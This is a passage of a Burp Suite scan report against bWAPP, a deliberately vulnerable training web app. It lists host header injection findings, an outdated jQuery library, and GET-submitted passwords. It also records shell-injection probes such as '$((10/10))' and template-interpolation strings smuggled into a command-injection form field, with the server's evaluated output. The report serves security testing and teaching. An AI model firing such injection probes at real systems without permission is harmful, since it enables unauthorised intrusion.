    ...[SNIP]...
    9.4. http://192.168.52.147/bWAPP/passwords/ [PHPSESSID cookie]

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/passwords/

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/passwords/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:08:21 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 1385
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/passwords</title>
    </head>
    <body>
    <h1>Index of /bWAPP/passwords</h1>
    <table><tr><th><img src="/icons/bl
    ...[SNIP]...

    Request 2

    GET /bWAPP/passwords/?cachebust=1520572096.46 HTTP/1.1
    Host: 851xkp.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 05:08:21 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 1392
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/passwords</title>
    </head>
    <body>
    <h1>Index of /bWAPP/passwords</h1>
    <table><tr><th><img src="/icons/bl
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at 851xkp.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.5. http://192.168.52.147/bWAPP/passwords/accounts.txt [PHPSESSID cookie]

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/passwords/accounts.txt

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/passwords/accounts.txt HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 404 Not Found
    Date: Fri, 09 Mar 2018 05:09:09 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 396
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /bWAPP/passwords/accounts.txt was not found on this s
    ...[SNIP]...

    Request 2

    GET /bWAPP/passwords/accounts.txt?cachebust=1520572145.27 HTTP/1.1
    Host: 57adbu.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 2

    HTTP/1.1 404 Not Found
    Date: Fri, 09 Mar 2018 05:09:10 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 403
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /bWAPP/passwords/accounts.txt was not found on this s
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at 57adbu.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.6. http://192.168.52.147/bWAPP/ws_soap.php [PHPSESSID cookie]

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/ws_soap.php

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/ws_soap.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:09:48 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 4954
    Connection: close
    Content-Type: text/html


           <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
           <style type="text/css">
            body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
    ...[SNIP]...

    Request 2

    GET /bWAPP/ws_soap.php?cachebust=1520575783.75 HTTP/1.1
    Host: bc5mkf.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:09:50 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 4961
    Connection: close
    Content-Type: text/html


           <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
           <style type="text/css">
            body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
    ...[SNIP]...
    </font> http://bc5mkf.192.168.52.147/bWAPP/ws_soap.php<br>
    ...[SNIP]...
    10. The file 'jquery-1.4.4.min.js' includes a vulnerable version of the library 'jquery'

    There are 3 instances of this issue:

    10.1. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/js/jquery-1.4.4.min.js

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability affects all versions prior to 1.6.3 (between * and 1.6.3)

    Other considerations

    The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

    The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/js/jquery-1.4.4.min.js HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/js/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce039-13309-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 78601
    Connection: close
    Content-Type: application/x-javascript

    /*!
    * jQuery JavaScript Library v1.4.4
    * http://jquery.com/
    *
    * Copyright 2010, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * http://jquery.org/license
    *
    * Includes Siz
    ...[SNIP]...
    10.2. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/js/jquery-1.4.4.min.js

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability affects all versions prior to 1.9.0b1 (between * and 1.9.0b1)

    Other considerations

    The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

    The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/js/jquery-1.4.4.min.js HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/js/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce039-13309-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 78601
    Connection: close
    Content-Type: application/x-javascript

    /*!
    * jQuery JavaScript Library v1.4.4
    * http://jquery.com/
    *
    * Copyright 2010, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * http://jquery.org/license
    *
    * Includes Siz
    ...[SNIP]...
    10.3. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/js/jquery-1.4.4.min.js

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0)

    Other considerations

    The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.

    The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/js/jquery-1.4.4.min.js HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/js/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce039-13309-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 78601
    Connection: close
    Content-Type: application/x-javascript

    /*!
    * jQuery JavaScript Library v1.4.4
    * http://jquery.com/
    *
    * Copyright 2010, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * http://jquery.org/license
    *
    * Includes Siz
    ...[SNIP]...
    11. Interesting input handling: Shell injection

    Summary

    Severity:   Medium
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php

    Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

    Issue detail

    The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order, with evidence. Response attributes that only stay consistent in one probe-set are italicised, with the variable attribute starred.

    Successful probes

    Backend Parameter Injection     $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d   &zq=x%3c%61%60%27%22%24%7b%7b%5c
    word_count            *901*   912
    visible_word_count    *735*   746
    content_length        *X*     Y
    line_count            *134*   141
    To scan for backend parameters, right click on the attached request and select 'Identify Backend Parameters'. This option may not be available for non-standard parameters. Scan progress is visible in this extension's output tab, and new scanner issues will be created for any parameters identified.

    Interpolation fuzz     %{{z${{z   }}%z}}$z
    visible_text          X       *Y*
    word_count            892     *901*
    whole_body_content    X       *Y*
    visible_word_count    726     *735*
    content_length        X       *Y*
    line_count            132     *134*

    Interpolation - dollar     ${{z   }}$z
    visible_text          X       *Y*
    word_count            892     *901*
    whole_body_content    X       *Y*
    visible_word_count    726     *735*
    content_length        X       *Y*
    line_count            132     *134*

    Shell injection     $((10/00))   $((10/10))
    word_count            892     902
    visible_word_count    726     736
    input_reflections     0       1
    line_count            132     137
    visible_text          X       *Y*
    whole_body_content    X       *Y*
    content_length        X       *Y*

    Request 1

    POST /bWAPP/commandi.php?hqlyu7coqf6=1 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 89
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.gov$zq=%253c%2561%2560%2527%2522%2524%257b%257b%255c%26zq%253d

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:08:09 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13001

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 2

    POST /bWAPP/commandi.php?u7m683=1 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 81
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.gov%26zq=%253c%2561%2560%2527%2522%2524%257b%257b%255c

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:08:09 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13201

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 3

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 51
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govjpiun9up4z%25{{zz${{z

    Response 3

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:10:59 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12947

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 4

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 49
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govtzed32r62}}%25z}}$z

    Response 4

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:10:44 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13001

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 5

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 46
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govztyjd72dbw1z${{z

    Response 5

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:14:30 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12947

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 6

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 45
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govxmlkz7r50u0}}$z

    Response 6

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:14:15 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13001

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 7

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 48
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govv7fi91lls2$((1/0))

    Response 7

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:15:34 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12947

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...

    Request 8

    POST /bWAPP/commandi.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/commandi.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 46
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govw3sod3$((10/10))

    Response 8

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:15:34 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13046

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <p align="left">Server:        192.168.52.2
    Address:    192.168.52.2#53

    ** server can't find www.nsa.govw3sod31: NXDOMAIN

    </p>
    ...[SNIP]...
    12. Password submitted using GET method

    There are 2 instances of this issue:

    Issue background

    Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

    Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

    12.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:
    • http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    The form contains the following password field:
    • passphrase

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
